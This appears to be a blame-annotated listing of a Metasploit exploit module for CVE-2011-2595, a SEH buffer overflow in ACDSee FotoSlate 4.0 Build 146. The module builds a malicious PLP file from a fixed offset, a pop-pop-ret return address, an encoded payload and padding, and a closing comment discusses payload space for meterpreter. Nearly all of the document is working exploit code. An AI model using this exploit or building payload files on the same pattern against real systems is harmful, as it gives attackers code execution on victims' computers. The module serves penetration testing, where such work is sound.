2011-10-10 16:11:05 +00:00
|
|
|
##
|
2014-10-17 16:47:33 +00:00
|
|
|
# This module requires Metasploit: http://metasploit.com/download
|
2013-10-15 18:50:46 +00:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
2011-10-10 16:11:05 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
2016-03-08 13:02:44 +00:00
|
|
|
class MetasploitModule < Msf::Exploit::Remote
|
2013-08-30 21:28:54 +00:00
|
|
|
Rank = GoodRanking
|
2011-10-10 16:11:05 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
include Msf::Exploit::FILEFORMAT
|
|
|
|
include Msf::Exploit::Remote::Seh
|
2011-10-10 16:11:05 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def initialize(info = {})
|
|
|
|
super(update_info(info,
|
|
|
|
'Name' => 'ACDSee FotoSlate PLP File id Parameter Overflow',
|
|
|
|
'Description' => %q{
|
|
|
|
This module exploits a buffer overflow in ACDSee FotoSlate 4.0 Build 146 via
|
|
|
|
a specially crafted id parameter in a String element. When viewing a malicious
|
|
|
|
PLP file with the ACDSee FotoSlate product, a remote attacker could overflow a
|
|
|
|
buffer and execute arbitrary code. This exploit has been tested on systems such as
|
|
|
|
Windows XP SP3, Windows Vista, and Windows 7.
|
|
|
|
},
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'Author' =>
|
|
|
|
[
|
|
|
|
'Parvez Anwar', # Vulnerability discovery
|
|
|
|
'juan vazquez' # Metasploit module
|
|
|
|
],
|
|
|
|
'References' =>
|
|
|
|
[
|
|
|
|
[ 'CVE', '2011-2595' ],
|
|
|
|
[ 'OSVDB', '75425' ],
|
|
|
|
[ 'BID', '49558' ],
|
|
|
|
],
|
|
|
|
'DefaultOptions' =>
|
|
|
|
{
|
|
|
|
'EXITFUNC' => 'process',
|
|
|
|
'DisablePayloadHandler' => 'true'
|
|
|
|
},
|
|
|
|
'Payload' =>
|
|
|
|
{
|
|
|
|
#'Space' => 4000,
|
|
|
|
'BadChars' => "\x00\x22"
|
|
|
|
},
|
|
|
|
'Platform' => 'win',
|
|
|
|
'Targets' =>
|
|
|
|
[
|
|
|
|
[
|
|
|
|
'ACDSee FotoSlate 4.0 Build 146',
|
|
|
|
{
|
|
|
|
'Ret' => 0x263a5b57, # pop, pop, ret from ipwssl6.dll
|
|
|
|
'Offset' => 1812,
|
|
|
|
'TotalLength' => 5000
|
|
|
|
}
|
|
|
|
],
|
|
|
|
],
|
|
|
|
'Privileged' => false,
|
|
|
|
'DisclosureDate' => 'Sep 12 2011',
|
|
|
|
'DefaultTarget' => 0))
|
2011-10-10 16:11:05 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
OptString.new('FILENAME', [ true, 'The file name.', 'msf.plp']),
|
|
|
|
], self.class)
|
|
|
|
end
|
2011-10-10 16:11:05 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def exploit
|
2011-10-10 16:11:05 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
overflow = rand_text(target["Offset"])
|
|
|
|
overflow << generate_seh_record(target.ret)
|
|
|
|
overflow << payload.encoded
|
|
|
|
overflow << rand_text_alpha(target["TotalLength"] - overflow.length)
|
2011-10-10 16:11:05 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
plp =<<TEMPLATE
|
2011-10-10 16:11:05 +00:00
|
|
|
<?xml version="1.0" encoding="ISO-8859-1"?>
|
|
|
|
<ACDFotoSlateDocument15>
|
|
|
|
<PageDefinition>
|
|
|
|
<Template>
|
|
|
|
<Version>3.0</Version>
|
|
|
|
<Page>
|
|
|
|
<Name>Letter</Name>
|
|
|
|
<Properties>
|
|
|
|
<String id="#{overflow}"></String>
|
|
|
|
<String id="Width">8.500000IN</String>
|
|
|
|
<String id="Height">11.000000IN</String>
|
|
|
|
<String id="Orientation">Portrait</String>
|
|
|
|
<Bool id="AutoRotate">FALSE</Bool>
|
|
|
|
<Bool id="AutoFill">FALSE</Bool>
|
|
|
|
</Properties>
|
|
|
|
<Content>
|
|
|
|
<Bool id="UseBGColor">FALSE</Bool>
|
|
|
|
<Int id="BGImageType">0</Int>
|
|
|
|
<String id="BGImageFile"></String>
|
|
|
|
<Int id="BGColor">16777215</Int>
|
|
|
|
</Content>
|
|
|
|
</Page>
|
|
|
|
<ToolList>
|
|
|
|
<Group>
|
|
|
|
<Tool>
|
|
|
|
<Name>Image</Name>
|
|
|
|
<Properties>
|
|
|
|
<String id="XPos">0.500000IN</String>
|
|
|
|
<String id="YPos">0.500000IN</String>
|
|
|
|
<String id="Width">7.500000IN</String>
|
|
|
|
<String id="Height">10.000000IN</String>
|
|
|
|
<Float id="Tilt">0.000000</Float>
|
|
|
|
</Properties>
|
|
|
|
<Content>
|
|
|
|
<Int id="ShapeType">0</Int>
|
|
|
|
<Float id="RoundRectX">0.000000</Float>
|
|
|
|
<Float id="RoundRectY">0.000000</Float>
|
|
|
|
<Bool id="ShrinkToFit">FALSE</Bool>
|
|
|
|
<Bool id="AutoRotate">FALSE</Bool>
|
|
|
|
<Float id="BorderWidth">0.000000</Float>
|
|
|
|
<Bool id="UseBGColor">FALSE</Bool>
|
|
|
|
<Int id="BGColor">8454143</Int>
|
|
|
|
<Bool id="DropShadow">FALSE</Bool>
|
|
|
|
<Int id="DSColor">0</Int>
|
|
|
|
<Bool id="BevelEdge">FALSE</Bool>
|
|
|
|
<Bool id="Border">FALSE</Bool>
|
|
|
|
<Int id="BorderColor">16711680</Int>
|
|
|
|
<Bool id="IsLocked">FALSE</Bool>
|
|
|
|
</Content>
|
|
|
|
</Tool>
|
|
|
|
</Group>
|
|
|
|
</ToolList>
|
|
|
|
</Template>
|
|
|
|
<PageContent>
|
|
|
|
<Version>3.0</Version>
|
|
|
|
<Page>
|
|
|
|
<Name>Letter</Name>
|
|
|
|
<Content>
|
|
|
|
<Bool id="UseBGColor">FALSE</Bool>
|
|
|
|
<Int id="BGImageType">0</Int>
|
|
|
|
<String id="BGImageFile"></String>
|
|
|
|
<Int id="BGColor">16777215</Int>
|
|
|
|
</Content>
|
|
|
|
</Page>
|
|
|
|
<ToolList>
|
|
|
|
<Group>
|
|
|
|
<Tool>
|
|
|
|
<Name>Image</Name>
|
|
|
|
<Content>
|
|
|
|
<Int id="ShapeType">0</Int>
|
|
|
|
<Float id="RoundRectX">0.000000</Float>
|
|
|
|
<Float id="RoundRectY">0.000000</Float>
|
|
|
|
<Bool id="ShrinkToFit">FALSE</Bool>
|
|
|
|
<Bool id="AutoRotate">FALSE</Bool>
|
|
|
|
<Float id="BorderWidth">0.000000</Float>
|
|
|
|
<Bool id="UseBGColor">FALSE</Bool>
|
|
|
|
<Int id="BGColor">8454143</Int>
|
|
|
|
<Bool id="DropShadow">FALSE</Bool>
|
|
|
|
<Int id="DSColor">0</Int>
|
|
|
|
<Bool id="BevelEdge">FALSE</Bool>
|
|
|
|
<Bool id="Border">FALSE</Bool>
|
|
|
|
<Int id="BorderColor">16711680</Int>
|
|
|
|
<Bool id="IsLocked">FALSE</Bool>
|
|
|
|
</Content>
|
|
|
|
</Tool>
|
|
|
|
</Group>
|
|
|
|
</ToolList>
|
|
|
|
</PageContent>
|
|
|
|
</PageDefinition>
|
|
|
|
</ACDFotoSlateDocument15>
|
|
|
|
TEMPLATE
|
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
print_status("Creating '#{datastore['FILENAME']}' file ...")
|
|
|
|
file_create(plp)
|
|
|
|
end
|
2011-10-10 16:11:05 +00:00
|
|
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
|
|
=begin
|
|
|
|
After SEH, we have ~0x23C3 bytes (9155 in decimal) of space for payload. But we need to avoid
|
|
|
|
using a long buffer in order to avoid the meterpreter possibly being broken.
|
|
|
|
=end
|